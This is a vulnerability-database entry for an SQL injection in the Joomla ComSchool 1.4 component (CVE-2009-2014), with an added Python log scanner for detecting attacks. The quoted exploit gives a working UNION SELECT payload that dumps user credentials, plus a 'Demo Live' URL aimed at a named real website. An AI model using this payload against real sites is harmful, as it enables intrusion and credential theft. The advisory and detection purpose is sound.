Joomla! Component "ComSchool" 'classid' Parameter SQL Injection Vulnerability

Vulnerability ID: 1117924    Vulnerability type: SQL injection
Published: 2009-06-08    Updated: 2009-06-09
CVE ID: CVE-2009-2014    CNNVD-ID: CNNVD-200906-125
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/8891
https://cxsecurity.com/issue/WLB-2009060135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-125
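|Vulnerability details
A SQL injection vulnerability exists in version 1.4 of the Joomla! ComSchool (com_school) component. A remote attacker can execute arbitrary SQL commands via the classid parameter in a showclass action to index.php.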
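
A log-review sketch for this issue, added here as an example and not part of the original advisory or the component's code: it flags com_school showclass requests whose classid is not a plain decimal number. That classid is meant to be a numeric ID, the combined access-log format, the function name and the sample lines are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style; not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2009:10:01:02 +0000] "GET /index.php?'
    'option=com_school&Itemid=3&func=showclass&classid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jun/2009:10:02:11 +0000] "GET /index.php?'
    'option=com_school&Itemid=null&func=showclass'
    '&classid=-null%27+union+select+1,2+from+t/* HTTP/1.1" 200 7311',
    '192.0.2.44 - - [08/Jun/2009:10:03:40 +0000] "GET /index.php?'
    'option=com_content&view=article&id=5 HTTP/1.1" 200 9000',
    '203.0.113.9 - - [08/Jun/2009:10:04:05 +0000] "GET /index.php?'
    'option=com_school&func=showclass&classid=7%20or%201=1 HTTP/1.1" 200 4100',
]

# client address, timestamp, method, request target
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
NUMERIC_ID = re.compile(r'\d+')


def suspicious_classid_requests(lines):
    """Return (client, decoded classid) for every com_school showclass
    request whose classid is not purely numeric (assumed expectation)."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line
        client, _timestamp, _method, target = match.groups()
        # parse_qs URL-decodes values, so %27 becomes ' and + becomes a space
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_school" not in params.get("option", []):
            continue
        if "showclass" not in params.get("func", []):
            continue
        for value in params.get("classid", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_classid_requests(SAMPLE_LOG):
        print(f"{client}\tclassid={value!r}")
```

The same allow-list test (digits only) is what the component would need to apply to classid before it reaches a query, alongside parameter binding.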
|Exploit (EXP)
----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

 <Sql Code>:
 -null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
 

Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>

# milw0rm.com [2009-06-08]
|References

Source: XF
Name: joomla-comschool-classid-sql-injection(50988)
Link: http://xforce.iss.net/xforce/xfdb/50988
Source: BID
Name: 35257
Link: http://www.securityfocus.com/bid/35257
Source: MILW0RM
Name: 8891
Link: http://www.milw0rm.com/exploits/8891